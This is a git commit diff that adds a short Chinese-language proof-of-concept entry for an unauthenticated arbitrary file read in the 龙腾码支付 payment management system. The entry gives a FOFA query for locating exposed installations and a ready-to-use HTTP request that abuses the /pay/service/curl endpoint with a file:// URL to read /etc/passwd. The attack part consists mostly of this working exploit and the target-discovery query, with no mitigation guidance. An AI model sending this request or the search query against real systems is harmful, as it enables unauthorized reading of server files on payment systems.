Update 龙腾码支付payservicecurl任意文件读取.md

2025-08-05 01:02:11 +00:00 · 2025-04-21 09:06:57 +08:00 · 2025-04-21 09:06:57 +08:00 · d90915b9f7
commit d90915b9f7
parent afc7e3f9df
1 changed files with 14 additions and 0 deletions
--- a/wpoc/龙腾码支付/龙腾码支付payservicecurl任意文件读取.md
+++ b/wpoc/龙腾码支付/龙腾码支付payservicecurl任意文件读取.md
@ -1 +1,15 @@
+# 龙腾码支付payservicecurl任意文件读取

+# 一、漏洞简介
+龙腾码支付管理系统存在未授权的任意文件读取漏洞
+
+# 二、影响版本
+ 龙腾码支付
+
+# 三、资产测绘
+ fofa`body="/epaydoc/epaydoc.php"`
+
+# 四、漏洞复现
+```plain
+GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1
+```